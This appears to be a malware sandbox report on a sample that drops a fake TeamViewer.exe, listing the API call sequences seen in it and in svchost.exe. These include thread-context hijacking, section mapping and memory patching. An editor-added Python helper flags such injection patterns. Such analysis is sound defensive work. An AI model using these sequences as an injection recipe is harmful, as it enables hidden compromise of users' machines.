Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F33ADE0 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F33AFC0 NtGetContextThread,NtSetContextThread,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F338400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F33B270 NtResumeThread,NtClose,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F33AD39 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F33A500 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F332750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F336D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F3323B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F337790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F3319F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F33AE20 NtOpenThread,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F331C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F332640 #404,RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,#404,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F334EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F3314E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F33B2D0 RtlMoveMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F332ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3318D0 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33AFC0 NtGetContextThread,NtSetContextThread,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F336D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33ADE0 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F337790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F338510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F338400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33B270 NtResumeThread,NtClose,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33B1F0 NtSuspendThread,NtClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33AE20 NtOpenThread,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F334EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,wsprintfA,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F332ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33AD39 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F331C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F3319F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F3318D0 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F332750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F332640 #404,RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,#404,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33A500 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F3314E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F3323B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33B2D0 RtlMoveMemory,NtFlushInstructionCache,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F338510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,wsprintfA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33AD39 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33A500 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F332750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F336D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F3323B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F337790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F3319F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33B1F0 NtSuspendThread,NtClose,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33ADE0 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33AFC0 NtGetContextThread,NtSetContextThread,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33AE20 NtOpenThread,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F338400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F331C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33B270 NtResumeThread,NtClose,HeapFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F332640 RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F334EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F3314E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33B2D0 RtlMoveMemory,NtFlushInstructionCache,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F332ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F3318D0 NtProtectVirtualMemory,
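The "Code function" rows above are flat call lists, so the sequences worth a second look are easy to miss in them: CreateProcessA followed by NtGetContextThread, NtSetContextThread and NtResumeThread in 2_2_6F332750; a section that is created, mapped twice and unmapped in 2_2_6F332640; NtWriteVirtualMemory followed by NtFlushInstructionCache in 6F338400, which is present in both the TeamViewer.exe and the svchost.exe address space. The Python below is an editor-added triage helper, not code from the Joe Sandbox report or from the sample, that pulls such rows apart and matches them against ordered API patterns. The pattern table and its names are the editor's assumptions rather than sandbox signature names, and the sample rows are copied from the report above. An ordered-subsequence match on a static call list is a heuristic: it says which functions deserve a look in the disassembly, not that the calls execute in that order or against another process at runtime.

```python
"""Match sandbox 'Code function' call lists against ordered API patterns.

Editor-added triage helper; not part of the Joe Sandbox report or the sample.
"""
import re
from typing import Dict, List, Sequence, Tuple

# Ordered patterns: each step is a tuple of acceptable API names, and every
# step must occur in this order somewhere in the call list (other calls may
# sit between them). Pattern names and steps are this editor's assumptions.
Pattern = Sequence[Tuple[str, ...]]
PATTERNS: Dict[str, Pattern] = {
    "thread_context_hijack": (
        ("CreateProcessA", "CreateProcessW"),
        ("NtGetContextThread", "GetThreadContext"),
        ("NtSetContextThread", "SetThreadContext"),
        ("NtResumeThread", "ResumeThread"),
    ),
    "section_map_copy": (
        ("NtCreateSection",),
        ("NtMapViewOfSection",),
        ("NtMapViewOfSection",),
        ("NtUnmapViewOfSection",),
    ),
    "inmem_patch": (
        ("NtQueryVirtualMemory",),
        ("NtWriteVirtualMemory",),
        ("NtFlushInstructionCache",),
    ),
    "service_delete": (
        ("OpenSCManagerA", "OpenSCManagerW"),
        ("OpenServiceA", "OpenServiceW"),
        ("ControlService",),
        ("DeleteService",),
    ),
    "priv_reboot": (
        ("OpenProcessToken",),
        ("LookupPrivilegeValueA", "LookupPrivilegeValueW"),
        ("AdjustTokenPrivileges",),
        ("ExitWindowsEx",),
    ),
}

# '<pid>_<round>_<address>' followed by the comma-separated call list.
LINE_RE = re.compile(r"Code function:\s*(?P<fid>\d+_\d+_[0-9A-Fa-f]+)\s+(?P<calls>.*)$")


def parse_line(line: str):
    """Return (function id, [api, ...]) for a 'Code function' row, else None."""
    m = LINE_RE.search(line)
    if not m:
        return None
    calls = [c.strip() for c in m.group("calls").split(",") if c.strip()]
    return m.group("fid"), calls


def is_ordered_subsequence(calls: Sequence[str], pattern: Pattern) -> bool:
    """True if every pattern step appears in `calls`, in order, gaps allowed."""
    it = iter(calls)  # shared iterator: each step resumes after the previous match
    return all(any(c in step for c in it) for step in pattern)


def scan(lines) -> Dict[str, List[str]]:
    """Map function id -> names of the patterns its call list satisfies."""
    hits: Dict[str, List[str]] = {}
    for line in lines:
        parsed = parse_line(line)
        if not parsed:
            continue
        fid, calls = parsed
        matched = [name for name, pat in PATTERNS.items() if is_ordered_subsequence(calls, pat)]
        if matched:
            hits[fid] = matched
    return hits


# Rows copied from the report above; the separator between the source path
# and the detail column is irrelevant to LINE_RE.
SAMPLE_ROWS = [
    r"Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F332750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,",
    r"Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F332640 #404,RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,#404,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,",
    r"Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_6F338400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache,",
    r"Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F334EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,",
    r"Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F333700 OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,QueryServiceStatus,ControlService,Sleep,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,",
]

if __name__ == "__main__":
    for fid, names in scan(SAMPLE_ROWS).items():
        print(fid, "->", ", ".join(names))
```

Run as-is it reports 2_2_6F332750, 2_2_6F332640, 6_2_6F338400 and 2_2_6F333700 and stays silent on 2_2_6F334EF0, whose CreateProcessA is followed only by a wait and a termination. The step tuples accept both the Nt* and the Win32 spelling so the same table works on reports where the sample called kernel32 rather than ntdll directly.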
Source: Teamviewer_Resource_ja.dll.1.dr | Static PE information: No import functions for PE file found
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameTeamViewer.exel& vs 77Etc0bR2v.exe
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameTeamViewer_Resource.dll\ vs 77Etc0bR2v.exe
Source: 77Etc0bR2v.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: TeamViewer.exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: TeamViewer.exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F333700 OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,QueryServiceStatus,ControlService,Sleep,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,
Source: 77Etc0bR2v.exe | Virustotal: Detection: 37%
Source: 77Etc0bR2v.exe | ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | File read: C:\Users\user\Desktop\77Etc0bR2v.exe
Source: 77Etc0bR2v.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Users\user\Desktop\77Etc0bR2v.exe 'C:\Users\user\Desktop\77Etc0bR2v.exe'
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknown | Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
